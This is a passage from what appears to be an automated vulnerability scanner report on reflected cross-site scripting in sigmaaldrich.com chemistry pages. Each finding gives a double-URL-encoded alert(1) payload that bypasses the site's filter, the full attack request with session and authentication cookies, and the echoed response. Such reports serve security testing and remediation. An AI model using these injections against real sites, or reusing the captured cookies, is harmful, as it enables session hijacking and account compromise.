Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistryd3111";alert(1)//60a8b7870b7/chemical-synthesis.html","E404") ;
   </script>
...[SNIP]...

1.45. http://www.sigmaaldrich.com/chemistry/chemical-synthesis.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54009%2522%253balert%25281%2529%252f%252fb4cada2562 was submitted in the REST URL parameter 2. This input was echoed as 54009";alert(1)//b4cada2562 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/54009%2522%253balert%25281%2529%252f%252fb4cada2562 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:18 GMT
Content-Length: 28913
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/54009";alert(1)//b4cada2562","E404") ;
   </script>
...[SNIP]...

1.46. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/chemical-synthesis-catalog.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/chemical-synthesis-catalog.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fbca%2522%253balert%25281%2529%252f%252fbb6e913b7f5 was submitted in the REST URL parameter 1. This input was echoed as 7fbca";alert(1)//bb6e913b7f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry7fbca%2522%253balert%25281%2529%252f%252fbb6e913b7f5/chemical-synthesis/chemical-synthesis-catalog.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:26 GMT
Content-Length: 28964
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry7fbca";alert(1)//bb6e913b7f5/chemical-synthesis/chemical-synthesis-catalog.html","E404") ;
   </script>
...[SNIP]...

1.47. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/chemical-synthesis-catalog.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/chemical-synthesis-catalog.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c91c%2522%253balert%25281%2529%252f%252f0941e48733 was submitted in the REST URL parameter 2. This input was echoed as 5c91c";alert(1)//0941e48733 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesis5c91c%2522%253balert%25281%2529%252f%252f0941e48733/chemical-synthesis-catalog.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:28 GMT
Content-Length: 28963
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesis5c91c";alert(1)//0941e48733/chemical-synthesis-catalog.html","E404") ;
   </script>
...[SNIP]...

1.48. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/chemical-synthesis-catalog.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/chemical-synthesis-catalog.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaf17%2522%253balert%25281%2529%252f%252faa51fede4f3 was submitted in the REST URL parameter 3. This input was echoed as aaf17";alert(1)//aa51fede4f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesis/aaf17%2522%253balert%25281%2529%252f%252faa51fede4f3 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:30 GMT
Content-Length: 28933
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesis/aaf17";alert(1)//aa51fede4f3","E404") ;
   </script>
...[SNIP]...

1.49. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 861f7%2522%253balert%25281%2529%252f%252fd30ccf931f9 was submitted in the REST URL parameter 1. This input was echoed as 861f7";alert(1)//d30ccf931f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry861f7%2522%253balert%25281%2529%252f%252fd30ccf931f9/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:28 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry861f7";alert(1)//d30ccf931f9/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html","E404") ;
   </script>
...[SNIP]...

1.50. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html

Issue detail

